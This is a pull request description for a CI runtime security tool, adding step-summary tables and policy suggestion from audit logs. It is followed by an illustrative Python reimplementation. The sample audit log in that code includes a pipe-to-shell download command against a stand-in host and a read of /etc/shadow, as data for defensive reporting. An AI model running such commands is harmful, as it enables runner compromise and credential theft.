report/suggest: enriched step summary + policy suggest from audit log #46
coronarium report

events by kind

denied samples (first 10)

📊 Open the full HTML report locally:

```sh
rm -rf /tmp/coronarium-25630421820 && gh run download 25630421820 -R bokuweb/sakimori -n coronarium-report -D /tmp/coronarium-25630421820 && (open /tmp/coronarium-25630421820/coronarium-report.html 2>/dev/null || xdg-open /tmp/coronarium-25630421820/coronarium-report.html 2>/dev/null || echo "open file:///tmp/coronarium-25630421820/coronarium-report.html")
```

Requires the
Closes two harden-runner parity gaps:

- `report::render_step_summary` now writes Network / Files / Processes top-N tables into `$GITHUB_STEP_SUMMARY` with denied rows flagged and sorted first, so reviewers can spot offending destinations on the run page without downloading the JSON log.
- New `coronarium policy suggest <log>` reads an audit-mode JSON log and emits a starter `policy.yml` (network.allow per host:port, file.allow per parent dir, exec targets surfaced as a commented observation block, never auto-denied).

Remaining harden-runner gaps (SNI egress, workspace tamper detection, floating-tag pin check, per-PID source attribution) are tracked in the new "harden-runner parity gaps" section of CLAUDE.md.

Co-Authored-By: Claude Opus 4.7 (1M context) <[email protected]>
Signed-off-by: bokuweb <[email protected]>
Summary

Closes two `step-security/harden-runner` parity gaps that came up in the gap analysis:

- `$GITHUB_STEP_SUMMARY`: `report::render_step_summary` now writes per-destination Network / per-path Files / per-binary Processes top-N tables into the step summary. Denied rows are flagged with ❌ and sorted to the top of the truncated table so the offending destinations surface even when the long tail of benign opens fills the rest. Pipe characters in commands and paths are escaped so a hostile filename can't break the table.
- `coronarium policy suggest <audit.json>`: new subcommand that reads a `coronarium run --mode audit --log foo.json` log and emits a starter `policy.yml`. `network.allow` gets one entry per `host:port` observed (hostname preferred over IP); `file.allow` gets one entry per parent directory observed; exec targets are surfaced as a commented `# observed_exec:` block so the operator can hand-pick what to deny. The suggester never auto-populates `process.deny_exec`. Reads from `-` as stdin too.

The remaining harden-runner gaps (SNI-based egress at the proxy, workspace tamper detection, floating-tag → SHA-pin static check, per-PID source attribution) are tracked under a new "harden-runner parity gaps" section in CLAUDE.md so they don't get lost. SaaS dashboard and automatic runner hardening are explicitly listed as out-of-scope.

Side effect: `Event` gains a `Deserialize` derive (was `Serialize`-only) so the audit log can round-trip through `policy suggest`.

Test plan

- `cargo fmt --all -- --check`
- `cargo clippy --workspace --all-targets -- -D warnings`
- `cargo test --workspace`: 14 new unit tests (8 in `suggest`, 6 in `report`) on top of the existing 80; all green
- `echo '{...samples...}' | coronarium policy suggest -` produces a sane YAML with hostname-keyed allow entries and a commented exec block
🤖 Generated with Claude Code
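As an added illustration, not code from the sakimori/coronarium repository (which is Rust), the following Python sketch shows the two mechanisms the PR describes: aggregating an audit-mode JSON-lines log into a starter policy (network allow per host:port with hostname preferred over IP, file allow per parent directory, exec targets only as a commented observation block, never a deny list) and rendering a top-N step-summary table in which denied rows sort first and pipes are escaped so a hostile path or command cannot break the table. The event field names (`kind`, `host`, `ip`, `port`, `path`, `command`, `verdict`) and the sample log lines are assumptions constructed for this example; coronarium's real schema may differ. One choice beyond the PR text: the suggester here skips events with a `deny` verdict, so feeding it an enforce-mode log does not turn an already-blocked destination into an allow entry.

```python
import json
import os
import sys
from collections import Counter

# Constructed sample audit log (JSON lines). Field names are an assumption
# for this example, not coronarium's actual event schema.
SAMPLE_LOG = "\n".join([
    '{"kind":"network","host":"api.github.com","ip":"140.82.112.6","port":443,"verdict":"allow"}',
    '{"kind":"network","host":"api.github.com","ip":"140.82.112.6","port":443,"verdict":"allow"}',
    '{"kind":"network","ip":"198.51.100.7","port":8443,"verdict":"deny"}',
    '{"kind":"file","path":"/home/runner/work/repo/src/main.rs","verdict":"allow"}',
    '{"kind":"file","path":"/home/runner/work/repo/src/lib.rs","verdict":"allow"}',
    '{"kind":"file","path":"/etc/shadow","verdict":"deny"}',
    '{"kind":"exec","command":"curl -s https://example.test/x | sh","verdict":"allow"}',
])


def load_log(path):
    """Read the log from a file, or from stdin when path is '-'."""
    if path == "-":
        return sys.stdin.read()
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def parse_events(text):
    """Parse a JSON-lines audit log; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def network_key(ev):
    # Hostname preferred over IP so the allow entry survives IP rotation.
    return f"{ev.get('host') or ev['ip']}:{ev['port']}"


def file_key(ev):
    # One entry per parent directory rather than per file.
    return os.path.dirname(ev["path"])


def exec_key(ev):
    return ev["command"]


KEYS = {"network": network_key, "file": file_key, "exec": exec_key}


def suggest_policy(events):
    """Aggregate observed events into a starter policy. Denied events are
    skipped (example's choice); exec targets are observed, never auto-denied."""
    seen = {"network": set(), "file": set(), "exec": set()}
    for ev in events:
        if ev.get("verdict") == "deny":
            continue
        seen[ev["kind"]].add(KEYS[ev["kind"]](ev))
    return {
        "network_allow": sorted(seen["network"]),
        "file_allow": sorted(seen["file"]),
        "observed_exec": sorted(seen["exec"]),
    }


def render_policy_yaml(policy):
    """Emit policy.yml text; json.dumps gives a YAML-safe quoted scalar."""
    lines = ["network:", "  allow:"]
    lines += [f"    - {json.dumps(k)}" for k in policy["network_allow"]]
    lines += ["file:", "  allow:"]
    lines += [f"    - {json.dumps(k)}" for k in policy["file_allow"]]
    # Commented block: the operator hand-picks what to deny from these.
    lines += ["# observed_exec: commands seen during the run; review before denying"]
    lines += [f"#   - {json.dumps(k)}" for k in policy["observed_exec"]]
    return "\n".join(lines) + "\n"


def md_escape(text):
    """Escape pipes so a hostile path or command cannot add table cells."""
    return str(text).replace("|", "\\|")


def summary_rows(events, kind, top_n=5):
    """Top-N (key, count, denied) rows. Denied keys sort first, then by
    count descending, so offenders survive truncation of the long tail."""
    counts, denied = Counter(), set()
    for ev in events:
        if ev["kind"] != kind:
            continue
        key = KEYS[kind](ev)
        counts[key] += 1
        if ev.get("verdict") == "deny":
            denied.add(key)
    rows = [(k, n, k in denied) for k, n in counts.items()]
    rows.sort(key=lambda r: (not r[2], -r[1], r[0]))
    return rows[:top_n]


def render_table(events, kind, top_n=5):
    """Markdown table for one event kind, as it would go into the step summary."""
    out = [f"| {kind} | count | verdict |", "|---|---|---|"]
    for key, count, is_denied in summary_rows(events, kind, top_n):
        verdict = "❌ denied" if is_denied else "allowed"
        out.append(f"| {md_escape(key)} | {count} | {verdict} |")
    return "\n".join(out)


if __name__ == "__main__":
    text = load_log(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    evs = parse_events(text)
    print(render_policy_yaml(suggest_policy(evs)))
    for k in ("network", "file", "exec"):
        print(render_table(evs, k), end="\n\n")
```

Run it with no arguments to process the embedded sample, or pass a log path (or `-` for stdin) to mirror the `policy suggest -` invocation from the test plan.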